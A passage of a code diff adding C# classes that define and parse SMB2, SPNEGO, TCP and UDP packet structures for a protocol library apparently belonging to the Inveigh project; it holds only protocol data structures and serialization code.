LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ +using System; +using System.Collections.Generic; +using System.Linq; +using System.Text; + +namespace Quiddity.SMB2 +{ + enum Channel : uint + { + SMB2_CHANNEL_NONE = 0x00000001, + SMB2_CHANNEL_RDMA_V1 = 0x0000002, + SMB2_CHANNEL_RDMA_V1_INVALIDATE = 0x00000003, + SMB2_CHANNEL_RDMA_TRANSFORM = 0x0000004 + } + + enum WriteRequestFlags : uint // Flags + { + SMB2_WRITEFLAG_WRITE_THROUGH = 0x00000001, + SMB2_WRITEFLAG_WRITE_UNBUFFERED = 0x0000002 + } + + class SMB2WriteRequest + { + // https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/e7046961-3318-4350-be2a-a8d69bb59ce8 + public ushort StructureSize { get; set; } + public ushort DataOffset { get; set; } + public uint Length { get; set; } + public ulong Offset { get; set; } + public byte[] Field { get; set; } + public uint Channel { get; set; } + public uint RemainingBytes { get; set; } + public ushort WriteChannelInfoOffset { get; set; } + public ushort WriteChannelInfoLength { get; set; } + public uint Flags { get; set; } + public byte[] Buffer { get; set; } + } +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2WriteResponse.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2WriteResponse.cs new file mode 100644 index 0000000..d7bb47d --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Commands/SMB2WriteResponse.cs @@ -0,0 +1,49 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ +using System; +using System.Collections.Generic; +using System.Linq; +using System.Text; + +namespace Quiddity.SMB2 +{ + class SMB2WriteResponse + { + // https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/7b80a339-f4d3-4575-8ce2-70a06f24f133 + public ushort StructureSize { get; set; } + public byte[] Reserved { get; set; } + public uint Count { get; set; } + public uint Remaining { get; set; } + public ushort WriteChannelInfoOffset { get; set; } + public ushort WriteChannelInfoLength { get; set; } + } +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/SMB2Header.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/SMB2Header.cs new file mode 100644 index 0000000..f62a8cd --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/SMB2Header.cs @@ -0,0 +1,133 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ +using System.IO; + +namespace Quiddity.SMB2 +{ + class SMB2Header + { + /* + https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/fb188936-5050-48d3-b350-dc43059638a4 + */ + public byte[] Protocol { get; set; } + public ushort StructureSize { get; set; } + public ushort CreditCharge { get; set; } + public byte[] Status { get; set; } // SMB2.x requests and all responses + public ushort ChannelSequence { get; set; } // SMB3.x requests + public ushort Reserved { get; set; } // SMB3.x requests + public ushort Command { get; set; } + public ushort Credit { get; set; } // CreditRequest/CreditResponse + public byte[] Flags { get; set; } + public byte[] NextCommand { get; set; } + public ulong MessageId { get; set; } + public uint Reserved2 { get; set; } // Process ID? + public uint TreeId { get; set; } + public byte[] SessionId { get; set; } + public byte[] Signature { get; set; } + + public SMB2Header() + { + this.Protocol = new byte[4] { 0xfe, 0x53, 0x4d, 0x42 }; + this.StructureSize = 64; + this.CreditCharge = 0; + this.Status = new byte[4]; + this.Command = 0; + this.Credit = 1; + this.Flags = new byte[4] { 0x01, 0x00, 0x00, 0x00 }; + this.NextCommand = new byte[4]; + this.MessageId = 0; + this.Reserved2 = 0; + this.TreeId = 0; + this.SessionId = new byte[8]; + this.Signature = new byte[16]; + } + + public SMB2Header(byte[] data) + { + ReadBytes(data, 0); + } + + public SMB2Header(byte[] data, int offset) + { + ReadBytes(data, offset); + } + + public void ReadBytes(byte[] data, int offset) + { + + using (MemoryStream memoryStream = new MemoryStream(data)) + { + PacketReader packetReader = new PacketReader(memoryStream); + memoryStream.Position = offset; + this.Protocol = packetReader.ReadBytes(4); + this.StructureSize = packetReader.ReadUInt16(); + this.CreditCharge = packetReader.ReadUInt16(); + this.Status = packetReader.ReadBytes(4); + this.Command = packetReader.ReadUInt16(); + this.Credit = packetReader.ReadUInt16(); + this.Flags = packetReader.ReadBytes(4); + this.NextCommand = packetReader.ReadBytes(4); + this.MessageId = packetReader.ReadUInt64(); + this.Reserved2 = packetReader.ReadUInt32(); + this.TreeId = packetReader.ReadUInt32(); + this.SessionId = packetReader.ReadBytes(8); + this.Signature = packetReader.ReadBytes(16); + } + + } + + public byte[] GetBytes() + { + + using (MemoryStream memoryStream = new MemoryStream()) + { + PacketWriter packetWriter = new PacketWriter(memoryStream); + packetWriter.Write(this.Protocol); + packetWriter.Write(this.StructureSize); + packetWriter.Write(this.CreditCharge); + packetWriter.Write(this.Status); + packetWriter.Write(this.Command); + packetWriter.Write(this.Credit); + packetWriter.Write(this.Flags); + packetWriter.Write(this.NextCommand); + packetWriter.Write(this.MessageId); + packetWriter.Write(this.Reserved2); + packetWriter.Write(this.TreeId); + packetWriter.Write(this.SessionId); + packetWriter.Write(this.Signature); + return memoryStream.ToArray(); + } + + } + + } +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/SMB2Helper.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/SMB2Helper.cs new file mode 100644 index 0000000..c149279 --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/SMB2Helper.cs @@ -0,0 +1,124 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ +using System; +using System.Net.Sockets; +using Quiddity.NetBIOS; +using Quiddity.Support; + +namespace Quiddity.SMB2 +{ + class SMB2Helper + { + public NetBIOSSessionService NetBIOS = new NetBIOSSessionService(); + public SMB2Header Header = new SMB2Header(); + public object Payload = new object(); + + public void Write(SMB2Helper Packet, NetworkStream Stream) + { + byte[] headerData = Packet.Header.GetBytes(); + byte[] commandData = new byte[0]; + + switch (Packet.Header.Command) + { + + case 0: + { + SMB2NegotiateResponse command = (SMB2NegotiateResponse)Packet.Payload; + commandData = command.GetBytes(); + } + break; + + case 1: + { + SMB2SessionSetupResponse command = (SMB2SessionSetupResponse)Packet.Payload; + commandData = command.GetBytes(); + } + break; + + } + + Packet.NetBIOS.Length = (ushort)(commandData.Length + 64); + byte[] netbiosData = Packet.NetBIOS.GetBytes(); + byte[] buffer = Utilities.BlockCopy(netbiosData, headerData, commandData); + Stream.Write(buffer, 0, buffer.Length); + Stream.Flush(); + } + + public static byte[] GetBytes(object smb2Command) + { + NetBIOSSessionService netBIOSSessionService = new NetBIOSSessionService(); + SMB2Header smb2Header = new SMB2Header(); + return GetBytes(netBIOSSessionService, smb2Header, smb2Command); + } + + public static byte[] GetBytes(NetBIOSSessionService netBIOSSessionService, SMB2Header smb2Header, object smb2Command) + { + byte[] headerData = smb2Header.GetBytes(); + byte[] commandData = new byte[0]; + + switch (smb2Header.Command) + { + + case 0: + { + SMB2NegotiateResponse command = (SMB2NegotiateResponse)smb2Command; + commandData = command.GetBytes(); + } + break; + + case 1: + { + SMB2SessionSetupResponse command = (SMB2SessionSetupResponse)smb2Command; + commandData = command.GetBytes(); + } + break; + + } + + netBIOSSessionService.Length = (ushort)(commandData.Length + 64); + byte[] netbiosData = netBIOSSessionService.GetBytes(); + return Utilities.BlockCopy(netbiosData, headerData, commandData); + } + + public void NegotiateProtocol() + { + + } + + public void SessionSetup() + { + + } + + } + +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/SMB2Packet.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/SMB2Packet.cs new file mode 100644 index 0000000..cea0137 --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/SMB2Packet.cs @@ -0,0 +1,42 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ +using System; +using System.Collections.Generic; +using System.Linq; +using System.Text; + +namespace Quiddity.SMB2 +{ + class SMB2Packet + { + } +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Structures/SMB2NegotiateContext.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Structures/SMB2NegotiateContext.cs new file mode 100644 index 0000000..af2c092 --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SMB2/Structures/SMB2NegotiateContext.cs @@ -0,0 +1,108 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ +using System; +using System.Linq; +using System.IO; + +namespace Quiddity.SMB2 +{ + class SMB2NegotiateContext + { + //https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/15332256-522e-4a53-8cd7-0bd17678a2f7 + public ushort ContextType { get; set; } + public ushort DataLength { get; set; } + public uint Reserved { get; set; } + public byte[] Data { get; set; } + + public SMB2NegotiateContext() + { + this.ContextType = 0; + this.DataLength = 0; + this.Reserved = 0; + this.Data = new byte[0]; + } + + public byte[] GetBytes(string[] contextTypes) + { + + using (MemoryStream memoryStream = new MemoryStream()) + { + PacketWriter packetWriter = new PacketWriter(memoryStream); + + if (contextTypes.Contains("1")) + { + this.ContextType = 1; + this.DataLength = 38; + byte[] key = new byte[32]; + Random random = new Random(); + random.NextBytes(key); + this.Data = new byte[38]; + Buffer.BlockCopy(new byte[6] { 0x01, 0x00, 0x20, 0x00, 0x01, 0x00 }, 0, this.Data, 0, 6); + Buffer.BlockCopy(key, 0, this.Data, 6, key.Length); + packetWriter.Write(this.ContextType); + packetWriter.Write(this.DataLength); + packetWriter.Write(this.Reserved); + packetWriter.Write(this.Data); + packetWriter.Write(new byte[2] { 0x000, 0x00 }); + } + + if (contextTypes.Contains("2")) + { + this.ContextType = 2; + this.DataLength = 4; + this.Data = new byte[4] { 0x01, 0x00, 0x2, 0x00 }; + packetWriter.Write(this.ContextType); + packetWriter.Write(this.DataLength); + packetWriter.Write(this.Reserved); + packetWriter.Write(this.Data); + packetWriter.Write(new byte[4] { 0x000, 0x00, 0x00, 0x00 }); + } + + if (contextTypes.Contains("3")) + { + this.ContextType = 3; + this.DataLength = 12; + this.Data = new byte[12] { 0x02, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x02, 0x00, 0x04, 0x00 }; + packetWriter.Write(this.ContextType); + packetWriter.Write(this.DataLength); + packetWriter.Write(this.Reserved); + packetWriter.Write(this.Data); + } + + return memoryStream.ToArray(); + } + + } + + } + +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SPNEGO/SPNEGONegTokenInit.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SPNEGO/SPNEGONegTokenInit.cs new file mode 100644 index 0000000..2674a01 --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SPNEGO/SPNEGONegTokenInit.cs @@ -0,0 +1,64 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ +using Quiddity.Support; + +namespace Quiddity.SPNEGO +{ + class SPNEGONegTokenInit + { + /* + https://tools.ietf.org/html/rfc4178#appendix-A + */ + public byte[] MechTypes { get; set; } + public byte[] ReqFlags { get; set; } + public byte[] MechToken { get; set; } + public byte[] MechListMIC { get; set; } + public byte[] NegHints { get; set; } + + public SPNEGONegTokenInit() + { + this.MechTypes = new byte[0]; + this.ReqFlags = new byte[10]; + this.MechToken = new byte[0]; + this.MechListMIC = new byte[0]; + this.NegHints = new byte[0]; + } + + public void Decode(byte[] data) + { + this.MechTypes = ASN1.GetTagBytes(6, data); + this.MechToken = ASN1.GetTagBytes(4, data); + } + + } + +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SPNEGO/SPNEGONegTokenResp.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SPNEGO/SPNEGONegTokenResp.cs new file mode 100644 index 0000000..37747c8 --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SPNEGO/SPNEGONegTokenResp.cs @@ -0,0 +1,55 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ + +namespace Quiddity.SPNEGO +{ + class SPNEGONegTokenResp + { + /* + https://tools.ietf.org/html/rfc4178#appendix-A + */ + public byte NegState { get; set; } + public byte[] SupportedMech { get; set; } + public byte[] ResponseToken { get; set; } + public byte[] MechListMIC { get; set; } + + public SPNEGONegTokenResp() + { + this.NegState = 0; + this.SupportedMech = new byte[10]; // todo check + this.ResponseToken = new byte[0]; + this.MechListMIC = new byte[0]; + } + + } + +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/TCP/TCPHeader.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/TCP/TCPHeader.cs new file mode 100644 index 0000000..7e5c059 --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/TCP/TCPHeader.cs @@ -0,0 +1,124 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE + * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. + */ +using System; +using System.Collections.Generic; +using System.IO; +using System.Linq; +using System.Text; + +namespace Quiddity.TCP +{ + class TCPHeader + { + // https://datatracker.ietf.org/doc/html/rfc793#section-3.1 + public ushort SourcePort { get; set; } + public ushort DestinationPort { get; set; } + public uint SequenceNumber { get; set; } + public uint AcknowledgementNumber { get; set; } + public int DataOffset { get; set; } + public int Reserved { get; set; } + public bool URG { get; set; } + public bool ACK { get; set; } + public bool PSH { get; set; } + public bool RST { get; set; } + public bool SYN { get; set; } + public bool FIN { get; set; } + public ushort Window { get; set; } + public ushort Checksum { get; set; } + public ushort UrgentPointer { get; set; } + public byte[] Options { get; set; } + public byte[] Padding { get; set; } + + // custom + public string Flags { get; set; } + + public void ReadBytes(byte[] data, int position) + { + + using (MemoryStream memoryStream = new MemoryStream(data)) + { + PacketReader packetReader = new PacketReader(memoryStream); + memoryStream.Position = position; + this.SourcePort = packetReader.BigEndianReadUInt16(); + this.DestinationPort = packetReader.BigEndianReadUInt16(); + this.SequenceNumber = packetReader.BigEndianReadUInt32(); + this.AcknowledgementNumber = packetReader.BigEndianReadUInt32(); + this.Flags = packetReader.ReadBinary(2); + ReadFlags(); + this.Window = packetReader.BigEndianReadUInt16(); + this.Checksum = packetReader.BigEndianReadUInt16(); + this.UrgentPointer = packetReader.BigEndianReadUInt16(); + this.Options = packetReader.BigEndianReadBytes(3); + this.Padding = packetReader.BigEndianReadBytes(3); + } + + } + + protected virtual void ReadFlags() + { + this.DataOffset = Convert.ToInt32(this.Flags.Substring(0, 4), 2) * 4; + this.Reserved = Convert.ToInt32(this.Flags.Substring(4, 3), 2); + + if (string.Equals(this.Flags.Substring(10, 1), "1")) + { + this.URG = true; + } + + if (string.Equals(this.Flags.Substring(11, 1), "1")) + { + this.ACK = true; + } + + if (string.Equals(this.Flags.Substring(12, 1), "1")) + { + this.PSH = true; + } + + if (string.Equals(this.Flags.Substring(13, 1), "1")) + { + this.RST = true; + } + + if (string.Equals(this.Flags.Substring(14, 1), "1")) + { + this.SYN = true; + } + + if (string.Equals(this.Flags.Substring(15, 1), "1")) + { + this.FIN = true; + } + + } + + } +} diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/UDP/UDPHeader.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/UDP/UDPHeader.cs new file mode 100644 index 0000000..34ffa84 --- /dev/null +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/UDP/UDPHeader.cs @@ -0,0 +1,130 @@ +/* + * BSD 3-Clause License + * + * Copyright (c) 2022, Kevin Robertson + * All rights reserved. + * + * Redistribution and use in source and binary forms, with or without + * modification, are permitted provided that the following conditions are met: + * + * 1. Redistributions of source code must retain the above copyright notice, this + * list of conditions and the following disclaimer. + * + * 2. Redistributions in binary form must reproduce the above copyright notice, + * this list of conditions and the following disclaimer in the documentation + * and/or other materials provided with the distribution. + * + * 3. Neither the name of the copyright holder nor the names of its + * contributors may be used to endorse or promote products derived from + * this software without specific prior written permission. + * + * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" + * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE + * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE + * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE + * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL + * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR + * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER + * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, + * OR TORT (INCLUDING NEGLIGENCE 